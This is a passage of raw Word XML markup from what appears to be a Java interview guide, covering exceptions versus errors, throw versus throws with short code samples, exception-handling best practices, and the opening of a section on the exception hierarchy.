    <w:p w14:paraId="5AE68317" w14:textId="77777777" w:rsidR="00A45CEC" w:rsidRPr="00CE4B95" w:rsidRDefault="00A45CEC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="912"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Example: NullPointerException, ArrayIndexOutOfBoundsException.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="583FEF55" w14:textId="77777777" w:rsidR="00A45CEC" w:rsidRPr="00CE4B95" w:rsidRDefault="00A45CEC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="912"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>These do not need to be explicitly handled, though it's generally a good practice to do so.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27CD71E3" w14:textId="77777777" w:rsidR="00A45CEC" w:rsidRPr="00CE4B95" w:rsidRDefault="00A45CEC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="912"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Errors</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: These represent serious issues that typically cannot be handled by the application.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F96DB6C" w14:textId="77777777" w:rsidR="00A45CEC" w:rsidRPr="00CE4B95" w:rsidRDefault="00A45CEC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="912"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Example: OutOfMemoryError, StackOverflowError.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="296C7C6D" w14:textId="77777777" w:rsidR="00A45CEC" w:rsidRPr="00CE4B95" w:rsidRDefault="00A45CEC" w:rsidP="006800ED">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>throw vs throws:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41EE324C" w14:textId="77777777" w:rsidR="00A45CEC" w:rsidRPr="00CE4B95" w:rsidRDefault="00A45CEC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="913"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>throw</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Used to explicitly throw an exception from a method or block of code.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A0C5923" w14:textId="77777777" w:rsidR="00A45CEC" w:rsidRPr="00CE4B95" w:rsidRDefault="00A45CEC" w:rsidP="00F86930">
      <w:pPr>
        <w:ind w:left="1440"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>public class CustomExceptionExample {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76C47126" w14:textId="77777777" w:rsidR="00A45CEC" w:rsidRPr="00CE4B95" w:rsidRDefault="00A45CEC" w:rsidP="00F86930">
      <w:pPr>
        <w:ind w:left="1440"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">    public static void main(String[] args) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6935AC0C" w14:textId="77777777" w:rsidR="00A45CEC" w:rsidRPr="00CE4B95" w:rsidRDefault="00A45CEC" w:rsidP="00F86930">
      <w:pPr>
        <w:ind w:left="1440"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">        try {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B164244" w14:textId="77777777" w:rsidR="00A45CEC" w:rsidRPr="00CE4B95" w:rsidRDefault="00A45CEC" w:rsidP="00F86930">
      <w:pPr>
        <w:ind w:left="1440"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">            throw new IllegalArgumentException("Custom error");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FF918D9" w14:textId="77777777" w:rsidR="00A45CEC" w:rsidRPr="00CE4B95" w:rsidRDefault="00A45CEC" w:rsidP="00F86930">
      <w:pPr>
        <w:ind w:left="1440"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">        } catch (IllegalArgumentException e) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="023B1720" w14:textId="77777777" w:rsidR="00A45CEC" w:rsidRPr="00CE4B95" w:rsidRDefault="00A45CEC" w:rsidP="00F86930">
      <w:pPr>
        <w:ind w:left="1440"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">            System.out.println("Caught exception: " + e.getMessage());</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FF2D562" w14:textId="77777777" w:rsidR="00A45CEC" w:rsidRPr="00CE4B95" w:rsidRDefault="00A45CEC" w:rsidP="00F86930">
      <w:pPr>
        <w:ind w:left="1440"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">        }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11F0D145" w14:textId="77777777" w:rsidR="00A45CEC" w:rsidRPr="00CE4B95" w:rsidRDefault="00A45CEC" w:rsidP="00F86930">
      <w:pPr>
        <w:ind w:left="1440"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E99052D" w14:textId="77777777" w:rsidR="00A45CEC" w:rsidRPr="00CE4B95" w:rsidRDefault="00A45CEC" w:rsidP="00F86930">
      <w:pPr>
        <w:ind w:left="1440"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F6889A2" w14:textId="77777777" w:rsidR="00A45CEC" w:rsidRPr="00CE4B95" w:rsidRDefault="00A45CEC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="913"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>throws</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Used in the method signature to declare that a method may throw one or more exceptions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5874D01C" w14:textId="77777777" w:rsidR="00A45CEC" w:rsidRPr="00CE4B95" w:rsidRDefault="00A45CEC" w:rsidP="00F86930">
      <w:pPr>
        <w:ind w:left="1440"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>public void readFile() throws IOException {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1460AE39" w14:textId="77777777" w:rsidR="00A45CEC" w:rsidRPr="00CE4B95" w:rsidRDefault="00A45CEC" w:rsidP="00F86930">
      <w:pPr>
        <w:ind w:left="1440"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">    // Code that may throw IOException</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C087156" w14:textId="77777777" w:rsidR="00A45CEC" w:rsidRPr="00CE4B95" w:rsidRDefault="00A45CEC" w:rsidP="00F86930">
      <w:pPr>
        <w:ind w:left="1440"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AF0C5A9" w14:textId="77777777" w:rsidR="00A45CEC" w:rsidRPr="00CE4B95" w:rsidRDefault="00A45CEC" w:rsidP="006800ED">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Best Practices for Exception Handling:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11DBC0EF" w14:textId="77777777" w:rsidR="00A45CEC" w:rsidRPr="00CE4B95" w:rsidRDefault="00A45CEC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="914"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Catch specific exceptions</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Instead of catching Exception, catch the most specific exception first (e.g., FileNotFoundException, SQLException).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="368550D0" w14:textId="77777777" w:rsidR="00A45CEC" w:rsidRPr="00CE4B95" w:rsidRDefault="00A45CEC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="914"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Don't use exceptions for normal flow</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Exceptions should be used for abnormal conditions. Avoid using them for controlling normal flow (e.g., loops).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="337A1A0C" w14:textId="77777777" w:rsidR="00A45CEC" w:rsidRPr="00CE4B95" w:rsidRDefault="00A45CEC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="914"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Don't leave empty catch blocks</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Catch blocks should handle exceptions properly, either by logging them, rethrowing them, or handling them in a meaningful way.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E461A12" w14:textId="77777777" w:rsidR="00A45CEC" w:rsidRPr="00CE4B95" w:rsidRDefault="00A45CEC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="914"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Use finally for cleanup</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Always release resources (like file streams, database connections) in the finally block to ensure they are closed, even if an exception occurs.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12630AF8" w14:textId="77777777" w:rsidR="00A45CEC" w:rsidRPr="00CE4B95" w:rsidRDefault="00A45CEC" w:rsidP="006800ED">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Conclusion:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CA88B41" w14:textId="77777777" w:rsidR="00A45CEC" w:rsidRPr="00CE4B95" w:rsidRDefault="00A45CEC" w:rsidP="006800ED">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Exception handling provides a way to gracefully handle errors and prevent your application from crashing. By using try-catch-finally, you can manage exceptions effectively and ensure that critical resources are cleaned up properly. It improves the robustness and reliability of your application.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12D813D7" w14:textId="36D346B5" w:rsidR="00595923" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00595923">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:pict w14:anchorId="27A66DE9">
          <v:rect id="_x0000_i1596" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="4676DA05" w14:textId="77777777" w:rsidR="00333734" w:rsidRPr="00CE4B95" w:rsidRDefault="00333734">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="200" w:name="_Toc196307680"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Explain the hierarchy of Exception?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="200"/>
    </w:p>
    <w:p w14:paraId="52B3F378" w14:textId="3AA8B491" w:rsidR="006C0087" w:rsidRPr="00CE4B95" w:rsidRDefault="006C0087" w:rsidP="009B4E28">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Java, </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>exception handling</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is based on a hierarchy of classes, all of which derive from the </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Throwable</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> class.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C9020C7" w14:textId="77777777" w:rsidR="006C0087" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="009B4E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56EB3868">
          <v:rect id="_x0000_i1597" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="2046587F" w14:textId="77777777" w:rsidR="006C0087" w:rsidRPr="00CE4B95" w:rsidRDefault="006C0087" w:rsidP="009B4E2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ception Hierarchy in Java</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45BDD0AF"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java.lang.Object  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DFBAD88"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r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:ascii="Cambria Math" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Cambria Math" w:cs="Cambria Math"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>↳</w:t>
      </w:r>
